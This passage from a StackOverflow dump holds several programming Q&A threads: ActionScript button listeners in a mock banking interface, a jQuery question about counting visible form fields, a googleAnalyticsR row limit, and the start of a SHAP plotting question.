bg.Menubtn13.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"backtomenu20\")\n {\n bg.backtomenu20.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn24\")\n {\n bg.Menubtn24.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"backtomenu27\")\n {\n bg.backtomenu27.removeEventListener(MouseEvent.CLICK, menu);\n }\n bg.gotoAndStop(3);\n bg.Balinq.addEventListener(MouseEvent.CLICK, menu);\n bg.Transinq.addEventListener(MouseEvent.CLICK, menu);\n bg.Fintrxns.addEventListener(MouseEvent.CLICK, menu);\n bg.invest.addEventListener(MouseEvent.CLICK, menu);\n bg.others.addEventListener(MouseEvent.CLICK, menu);\n bg.passchange.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==3)\n {\n bg.Balinq.removeEventListener(MouseEvent.CLICK, menu);\n bg.Transinq.removeEventListener(MouseEvent.CLICK, menu);\n bg.Fintrxns.removeEventListener(MouseEvent.CLICK, menu);\n bg.invest.removeEventListener(MouseEvent.CLICK, menu);\n bg.others.removeEventListener(MouseEvent.CLICK, menu);\n bg.passchange.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"Balinq\")\n {\n bg.gotoAndStop(2);\n bg.menubtn.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"Transinq\")\n {\n bg.gotoAndStop(4);\n bg.Menubtn4.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn4.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"Fintrxns\")\n {\n bg.gotoAndStop(6);\n bg.backtomain.addEventListener(MouseEvent.CLICK, menu);\n bg.transown.addEventListener(MouseEvent.CLICK, menu);\n bg.transthird.addEventListener(MouseEvent.CLICK, menu);\n bg.transanyone.addEventListener(MouseEvent.CLICK, menu);\n bg.billsdeposit.addEventListener(MouseEvent.CLICK, menu);\n bg.billscredit.addEventListener(MouseEvent.CLICK, menu);\n bg.reloadphone.addEventListener(MouseEvent.CLICK, menu);\n bg.reloadwallet.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"others\")\n {\n bg.gotoAndStop(20);\n bg.backtomenu20.addEventListener(MouseEvent.CLICK, menu);\n bg.checkbook.addEventListener(MouseEvent.CLICK, menu);\n bg.stoppay.addEventListener(MouseEvent.CLICK, menu);\n bg.enrollacct.addEventListener(MouseEvent.CLICK, menu);\n bg.enrollthird.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"passchange\")\n {\n bg.gotoAndStop(24);\n bg.Menubtn24.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"invest\")\n {\n bg.gotoAndStop(27);\n bg.backtomenu27.addEventListener(MouseEvent.CLICK, menu);\n bg.viewport.addEventListener(MouseEvent.CLICK, menu);\n bg.viewhist.addEventListener(MouseEvent.CLICK, menu);\n bg.subscribe.addEventListener(MouseEvent.CLICK, menu);\n bg.redeem.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (bg.currentFrame==4)\n {\n bg.Menubtn4.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn4.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(5);\n bg.Menubtn5.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==6)\n {\n bg.backtomain.removeEventListener(MouseEvent.CLICK, menu);\n bg.transown.removeEventListener(MouseEvent.CLICK, menu);\n bg.transthird.removeEventListener(MouseEvent.CLICK, menu);\n bg.transanyone.removeEventListener(MouseEvent.CLICK, menu);\n bg.reloadphone.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"transown\")\n {\n bg.gotoAndStop(7);\n bg.Menubtn7.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn7.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"transthird\")\n {\n bg.gotoAndStop(9);\n bg.Menubtn9.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn9.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"transanyone\")\n {\n bg.gotoAndStop(13);\n bg.Menubtn13.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn13.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"billsdeposit\")\n {\n bg.gotoAndStop(15);\n bg.finbtn15.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn15.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"billscredit\")\n {\n bg.gotoAndStop(28);\n bg.finbtn28.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"reloadphone\")\n {\n bg.gotoAndStop(17);\n bg.finbtn17.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn17.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"reloadwallet\")\n {\n bg.gotoAndStop(18);\n bg.finbtn18.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (bg.currentFrame==7)\n {\n bg.Menubtn7.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn7.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"okbtn7\")\n {\n bg.gotoAndStop(8);\n bg.finbtn8.addEventListener(MouseEvent.CLICK, menu);\n }\n } ;\/*current frame 8*\/\n }\n else if (m.target.name==\"finbtn8\" || m.target.name==\"finbtn10\" || m.target.name==\"finbtn11\" || m.target.name==\"finbtn12\" || m.target.name==\"finbtn14\" || m.target.name==\"finbtn15\" || m.target.name==\"finbtn16\" || m.target.name==\"finbtn17\" || m.target.name==\"finbtn18\" ||m.target.name==\"finbtn26\" ||m.target.name==\"finbtn28\")\n {\n if (m.target.name == \"finbtn8\")\n {\n bg.finbtn8.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn10\")\n {\n bg.finbtn10.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn11\")\n {\n bg.finbtn11.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn12\")\n {\n bg.finbtn12.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn14\")\n {\n bg.finbtn14.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn15\")\n {\n bg.finbtn15.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn16\")\n {\n bg.finbtn16.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn17\")\n {\n bg.finbtn17.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn18\")\n {\n bg.finbtn18.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn26\")\n {\n bg.finbtn26.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn28\")\n {\n bg.finbtn28.removeEventListener(MouseEvent.CLICK, menu);\n }\n bg.gotoAndStop(6);\n bg.backtomain.addEventListener(MouseEvent.CLICK, menu);\n bg.transown.addEventListener(MouseEvent.CLICK, menu);\n bg.transthird.addEventListener(MouseEvent.CLICK, menu);\n bg.transanyone.addEventListener(MouseEvent.CLICK, menu);\n bg.billsdeposit.addEventListener(MouseEvent.CLICK, menu);\n bg.billscredit.addEventListener(MouseEvent.CLICK, menu);\n bg.reloadphone.addEventListener(MouseEvent.CLICK, menu);\n bg.reloadwallet.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==9 || m.target.name==\"backbtn11\")\n {\n if (bg.currentFrame == 9)\n {\n bg.Menubtn9.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn9.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backbtn11\")\n {\n bg.finbtn11.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn11.removeEventListener(MouseEvent.CLICK, menu);\n bg.backbtn11.removeEventListener(MouseEvent.CLICK, menu);\n }\n bg.gotoAndStop(10);\n bg.finbtn10.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn10.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==10)\n {\n bg.finbtn10.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn10.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(11);\n bg.finbtn11.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn11.addEventListener(MouseEvent.CLICK, menu);\n bg.backbtn11.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==11)\n {\n bg.finbtn11.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn11.removeEventListener(MouseEvent.CLICK, menu);\n bg.backbtn11.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(12);\n bg.finbtn12.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==13)\n {\n bg.Menubtn13.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn13.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(14);\n bg.finbtn14.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==15)\n {\n bg.finbtn15.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn15.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(16);\n bg.finbtn16.addEventListener(MouseEvent.CLICK, menu);\n bg.backbtn16.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==16)\n {\n bg.gotoAndStop(15);\n bg.finbtn15.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==17)\n {\n bg.finbtn17.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn17.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(26);\n bg.finbtn26.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==20)\n {\n bg.backtomenu20.removeEventListener(MouseEvent.CLICK, menu);\n bg.checkbook.removeEventListener(MouseEvent.CLICK, menu);\n bg.stoppay.removeEventListener(MouseEvent.CLICK, menu);\n bg.enrollacct.removeEventListener(MouseEvent.CLICK, menu);\n bg.enrollthird.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"checkbook\")\n {\n bg.gotoAndStop(21);\n bg.otherbtn21.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"stoppay\")\n {\n bg.gotoAndStop(22);\n bg.otherbtn22.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"enrollacct\")\n {\n bg.gotoAndStop(23);\n bg.otherbtn23.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"enrollthird\")\n {\n bg.gotoAndStop(25);\n bg.otherbtn25.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (m.target.name==\"otherbtn21\" || m.target.name==\"otherbtn22\" || m.target.name==\"otherbtn23\" || m.target.name==\"otherbtn25\")\n {\n if (m.target.name == \"otherbtn21\")\n {\n bg.otherbtn21.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"otherbtn22\")\n {\n bg.otherbtn22.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"otherbtn23\")\n {\n bg.otherbtn23.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"otherbtn25\")\n {\n bg.otherbtn25.removeEventListener(MouseEvent.CLICK, menu);\n }\n bg.gotoAndStop(20);\n bg.backtomenu20.addEventListener(MouseEvent.CLICK, menu);\n bg.checkbook.addEventListener(MouseEvent.CLICK, menu);\n bg.stoppay.addEventListener(MouseEvent.CLICK, menu);\n bg.enrollacct.addEventListener(MouseEvent.CLICK, menu);\n bg.enrollthird.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==27)\n {\n bg.backtomenu27.removeEventListener(MouseEvent.CLICK, menu);\n bg.viewport.removeEventListener(MouseEvent.CLICK, menu);\n bg.viewhist.removeEventListener(MouseEvent.CLICK, menu);\n bg.subscribe.removeEventListener(MouseEvent.CLICK, menu);\n bg.redeem.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"viewport\")\n {\n bg.gotoAndStop(29);\n bg.backtoinvest29.addEventListener(MouseEvent.CLICK, menu);\n bg.okinvest1.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"viewhist\")\n {\n bg.gotoAndStop(32);\n bg.backtoinvest32.addEventListener(MouseEvent.CLICK, menu);\n bg.donebtn32.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"subscribe\")\n {\n bg.gotoAndStop(35);\n bg.backtoinvest35.addEventListener(MouseEvent.CLICK, menu);\n bg.donebtn35.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"redeem\")\n {\n bg.gotoAndStop(42);\n bg.backtoinvest42.addEventListener(MouseEvent.CLICK, menu);\n bg.okinvest4.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==29)\n {\n bg.backtoinvest29.removeEventListener(MouseEvent.CLICK, menu);\n bg.okinvest1.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"okinvest1\")\n {\n bg.gotoAndStop(30);\n bg.backtoinvest30.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame ==30)\n {\n bg.backtoinvest30.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn30.addEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"donebtn30\")\n {\n bg.gotoAndStop(31);\n bg.backtoinvest31.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (m.target.name==\"backtoinvest29\" || m.target.name==\"backtoinvest30\" || m.target.name==\"backtoinvest31\" || m.target.name==\"backtoinvest32\" || m.target.name==\"backtoinvest33\" || m.target.name==\"backtoinvest34\" || m.target.name==\"backtoinvest35\" || m.target.name==\"backtoinvest36\" || m.target.name==\"backtoinvest37\" || m.target.name==\"backtoinvest38\" ||m.target.name==\"backtoinvest39\" || m.target.name==\"backtoinvest41\" || m.target.name==\"backtoinvest42\" || m.target.name==\"backtoinvest43\" || m.target.name==\"backtoinvest44\" || m.target.name==\"backtoinvest45\" || m.target.name==\"backtoinvest46\" || m.target.name==\"backtoinvest47\" || m.target.name==\"backtoinvest48\")\n {\n if (m.target.name == \"backtoinvest29\")\n {\n bg.backtoinvest29.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest30\")\n {\n bg.backtoinvest30.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest31\")\n {\n bg.backtoinvest31.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest32\")\n {\n bg.backtoinvest32.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest33\")\n {\n bg.backtoinvest33.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest34\")\n {\n bg.backtoinvest34.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest35\")\n {\n bg.backtoinvest35.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest36\")\n {\n bg.backtoinvest36.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest37\")\n {\n bg.backtoinvest37.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest38\")\n {\n bg.backtoinvest38.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest39\")\n {\n bg.backtoinvest39.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest41\")\n {\n bg.backtoinvest41.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest42\")\n {\n bg.backtoinvest42.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest43\")\n {\n bg.backtoinvest43.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest44\")\n {\n bg.backtoinvest44.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest45\")\n {\n bg.backtoinvest45.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest46\")\n {\n bg.backtoinvest46.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest46\")\n {\n bg.backtoinvest46.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest47\")\n {\n bg.backtoinvest47.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest48\")\n {\n bg.backtoinvest48.removeEventListener(MouseEvent.CLICK, menu);\n }\n bg.gotoAndStop(27);\n bg.backtomenu27.addEventListener(MouseEvent.CLICK, menu);\n bg.viewport.addEventListener(MouseEvent.CLICK, menu);\n bg.viewhist.addEventListener(MouseEvent.CLICK, menu);\n bg.subscribe.addEventListener(MouseEvent.CLICK, menu);\n bg.redeem.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==32)\n {\n if (bg.currentFrame == 32)\n {\n bg.backtoinvest32.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn32.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"donebtn32\")\n {\n bg.gotoAndStop(33);\n bg.backtoinvest33.addEventListener(MouseEvent.CLICK, menu);\n bg.okinvest2.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okinvest2\")\n {\n bg.gotoAndStop(34);\n bg.backtoinvest33.removeEventListener(MouseEvent.CLICK, menu);\n bg.okinvest2.removeEventListener(MouseEvent.CLICK, menu);\n bg.backtoinvest34.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (bg.currentFrame==35)\n {\n bg.backtoinvest35.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn35.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"donebtn35\")\n {\n bg.gotoAndStop(36);\n bg.backtoinvest36.addEventListener(MouseEvent.CLICK, menu);\n bg.okinvest3.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okinvest3\")\n {\n bg.gotoAndStop(37);\n bg.backtoinvest37.addEventListener(MouseEvent.CLICK, menu);\n bg.donebtn37.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==37)\n {\n bg.backtoinvest36.removeEventListener(MouseEvent.CLICK, menu);\n bg.okinvest3.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"donebtn37\")\n {\n bg.gotoAndStop(38);\n bg.backtoinvest38.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn38.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==38)\n {\n bg.backtoinvest37.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn37.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn38\")\n {\n bg.gotoAndStop(39);\n bg.backtoinvest39.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn39.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==39)\n {\n bg.backtoinvest38.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn38.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn39\")\n {\n bg.gotoAndStop(40);\n bg.backtoinvest39.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn39.removeEventListener(MouseEvent.CLICK, menu);\n bg.backtoinvest39.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn40.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==40)\n {\n bg.okbtn40.removeEventListener(MouseEvent.CLICK, menu);\n bg.backtoinvest40.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn40\")\n {\n bg.gotoAndStop(41);\n bg.backtoinvest41.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (bg.currentFrame==42)\n {\n bg.backtoinvest42.removeEventListener(MouseEvent.CLICK, menu);\n bg.okinvest4.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"okinvest4\")\n {\n bg.gotoAndStop(42);\n bg.backtoinvest43.addEventListener(MouseEvent.CLICK, menu);\n bg.donebtn43.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==43)\n {\n bg.backtoinvest43.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn43.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"donebtn43\")\n {\n bg.gotoAndStop(44);\n bg.backtoinvest44.addEventListener(MouseEvent.CLICK, menu);\n bg.donebtn44.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==44)\n {\n bg.backtoinvest44.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn44.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"donebtn44\")\n {\n bg.gotoAndStop(45);\n bg.backtoinvest45.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn45.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==45)\n {\n bg.backtoinvest45.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn45.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn45\")\n {\n bg.gotoAndStop(46);\n bg.backtoinvest46.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn46.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==46)\n {\n bg.backtoinvest46.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn46.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn46\")\n {\n bg.gotoAndStop(47);\n bg.okbtn47.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==47)\n {\n bg.okbtn47.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn47\")\n {\n bg.gotoAndStop(48);\n bg.backtoinvest48.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n }\n }\n}\n<\/code>\nComment: Can you reproduce the problem with less code. That always helps me out to have a smaller reproduction of the broken code. Sometimes I even solve the problem by doing this.\nAnswer: Although useful to provide \"all the code\", in this case, you're obfuscating the core issue you're dealing with. Nowhere inside of it can the words \"View Portfolio\" or \"Investments\" be found, and with all the other button registrations, it'd require reading line-by-line to see if you typoed a button.\nFurthermore, as these interface elements appear not to have been created dynamically (but rather with the Flash IDE, thereby existing in the unseen library), there's no way for us to tell what the correct variable names should be.\nBe concise. Provide the smallest possible amount of code to reproduce the problem.\nSimplify. Anytime you see a repeating pattern of code, it probably means you can reduce with either a function or a loop.\nAll of these buttons are either registering or unregistering for '(MouseEvent.CLICK, menu)'. You can do this much faster with a loop, for example...\n<code>var buttons:Array = [\n bg.ok,\n bg.menubtn,\n bg.Balinq,\n bg.Transinq,\n bg.Fintrxns,\n bg.invest,\n bg.others,\n bg.passchange\n]\n\nfor (var btn in buttons) {\n btn.addEventListener(MouseEvent.CLICK, menu);\n}\n<\/code>\nNow when you need to do something to all those buttons, there's only one place you have to look.\n\nWhen a button is clicked, you're testing the name of the object and unregistering it. You can avoid this test and simply unregister the target. Ergo rather than this:\n<code>if (m.target.name == \"menubtn\") {\n bg.menubtn.removeEventListener(MouseEvent.CLICK, menu);\n}\n<\/code>\nJust do:\n<code>m.target.removeEventListener(MouseEvent.CLICK, menu);\n<\/code>\n\nAnother way to simplify your code is to make use of the switch operator. Methods like this...\n<code>if (m.target.name == \"viewport\") {\n \/\/ do a\n}\nif (m.target.name == \"viewhist\") {\n \/\/ do b\n}\nif (m.target.name == \"subscribe\") {\n \/\/ do c\n}\n<\/code>\nCan become...\n<code>switch (m.target.name) {\n case \"viewport\": \/\/ do a\n break;\n case \"viewhist\": \/\/ do b\n break;\n case \"subscribe\": \/\/ do c\n break;\n}\n<\/code>\nThis is handy when you know you're always comparing to test against the same variable.\n\nIn the end, reuseable code means for lightweight code which is easily maintainable, cuts down on grunt-work, and makes for a much more readable document. With what you're doing here, I'm fairly confident you could bring it from 650 down to about 50 lines of code.\n","meta":{"source":"stackoverflow","title":"Buttons Not Functioning as expected","dup_signals":{}},"subset":"stackexchange"} +{"text":"use jquery .length only on visible fields\n\nQuestion: I have a form that uses javascript to dynamically add fields when an \"Add field\" button is clicked. Additionally, users can remove fields by pressing a \"remove field\" button. If a field is removed, it is hidden and a hidden field called '_destroy' for that field is set to true. I am trying to make it so that a user can add a maximum of 3 fields. So far I have the following code:\n<code>function add_fields(link, association, content) {\n if($(\".order_number\").length > 2){\n alert(\"A schedule can have a maximum of 3 tasks.\")\n }else{\n \/\/add field code here\n }\n}\n<\/code>\nHere is the html:\n<code><tr class=\"add-task\">\n <td><input id=\"schedule_tasks_attributes_1394554386530_title\" \n class=\"field\" type=\"text\" \n name=\"schedule[tasks_attributes][1394554386530][title]\" \/>\n <\/td>\n <td>\n <input id=\"schedule_tasks_attributes_1394554386530_order_number\" \n class=\"order_number\" type=\"hidden\" \n name=\"schedule[tasks_attributes][1394554386530][order_number]\" \n value=\"4\" \/> \n <div id=\"remove_schedule_field_employer\">\n <input id=\"schedule_tasks_attributes_1394554386530__destroy\" \n type=\"hidden\" value=\"false\" \n name=\"schedule[tasks_attributes][1394554386530][_destroy]\" \/>\n <a onclick=\"remove_fields(this); return false;\" href=\"#\"><\/a>\n <\/div>\n <\/td>\n<\/tr>\n<\/code>\nThe problem is that the order number exists even when the field to be destroyed is hidden, so the alert message will come up even when the field is hidden. How do I make it so that the alert message only happens when the length of visible fields is greater than 3? I have tried the jquery .is(':visible') method but it returns a boolean, not the field, so I can't use .length on it.\nUPDATE:\nMaybe this will help. This is the js that removes the field. 'fieldo' is the class that surrounds the field.\n<code>function remove_fields(link) {\n $(link).prev(\"input[type=hidden]\").val(\"1\");\n $(link).closest(\".fieldo\").hide();\n}\n<\/code>\nComment: Maybe check your console to see if there are any other Javascript errors halting execution.\nAnswer: Actually it is kind of bug in jQuery, issue is the underscore in class name of element. \nTry removing it see demo:\n<code>$(\".ordernumber:visible\").length\n<\/code>\nComment: Thanks, that doesn't work though. The alert won't even appear.\nComment: see demo I have added. http:\/\/jsfiddle.net\/4RAde\/ Here it is alerting 2 and ignoring the hidden input.\nComment: in your code if alert is not coming it means it is going to else case which is correct.\nComment: Its not correct, because there are three visible fields, so the alert should appear.\nAnswer: Try:\n<code>function add_fields(link, association, content) {\n if($(\".order_number:visible\").length > 2){\n alert(\"A schedule can have a maximum of 3 tasks.\")\n }else{\n \/\/add field code here\n }\n}\n<\/code>\nThis will change the jQuery selector to select elements with class <code>.order_number<\/code> that has display set to 'block'\nComment: \"I have tried the jquery .is(':visible') method but it returns a boolean, not the field, so I can't use .length on it.\"\nComment: Ah, maybe try `$(\".order_number:visible\").length`\nComment: Thanks, tried that too, but unfortunately its still not working. The alert won't even appear with it.\nComment: Hmm, the :visible pseudo class looks only for CSS `display:block;` How are fields being removed?\nComment: I added the remove field code to the question content.\nAnswer: Use <code>.filter(':visible')<\/code> instead of <code>.is(':visible')<\/code>.\nComment: Thanks, I tried that, but it also does not work. The alert doesn't even appear.\nComment: @Philip7899: Oh, when you say \"hidden\", do you mean ``? `$('.order_number:not([type=\"hidden\"])')`.\nComment: Thanks, tried that but still not working... It still adds the field.\nComment: @Philip7899: Okay, that code did help. Thanks. Your ``s are the ones with the `order_number` class. If you don't want to change the HTML, I think `$('.order_number').closest('td').filter(':visible').length` would work, but it would probably better, in `remove_fields`, to do something like `$(link).prev('input[type=hidden]').val('1').addClass('removed')` and then check `$('.order_number:not(.removed)')`.\nComment: Thanks, this is closer. Now the alert message appears but it will appear even when there are only two or one visible fields also. I think its because the \"addClass('removed')\" is being applied to the wrong hidden field. I think its being applied to the field with id=\"schedule_tasks_attributes_1394554386530__destroy\" instead of the one with class=\"order_number\".\nComment: do you have any ideas?\nComment: Did you try the first one?\n","meta":{"source":"stackoverflow","title":"use jquery .length only on visible fields","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to Fix Row Limits Export, Google analytics to R\n\nQuestion: Hi I'm using GoogleAnalyticsR to import my data from Google Analytics but I'm having a problem because it only downloads 1,000 rows from a total of 1,000,000.\nAny advice how to download all 1,000,000?\nHere's my code!\n<code>df1 <- google_analytics_4(my_id, \n date_range = c(\"2016-05-13\", \"2017-05-13\"),\n metrics = c(\"pageviews\"),\n dimensions = c(\"pagePath\"))\n<\/code>\nComment: You need to look in to pagination you can only request 10000 rows at a time. look for pageToken\nAnswer: By default it gets 1000 rows, if you set <code>max = -1<\/code> in your call it gets everything:\n<code>df1 <- google_analytics_4(my_id, \n date_range = c(\"2016-05-13\", \"2017-05-13\"),\n metrics = \"pageviews\",\n dimensions = \"pagePath\",\n max = -1)\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to Fix Row Limits Export, Google analytics to R","dup_signals":{}},"subset":"stackexchange"} +{"text":"Shap plot crops\/truncates the feature names\n\nQuestion: <code>import csv\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot \nimport shap\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler\ndf1=pd.read_csv(\".\/wine.data\",sep=\",\",encoding='utf_8_sig')\nX_train = df1\nle = preprocessing.LabelEncoder()\nX_train['alc_class'] = le.fit_transform(X_train.alc_class.values)\nprint(X_train.columns)\n\nprint(X_train.describe())\n\ny = X_train['alc_class']\nX = X_train.drop(columns='alc_class')\nimport xgboost as xgb\n\n# split X and y into training and testing sets\n\nfrom 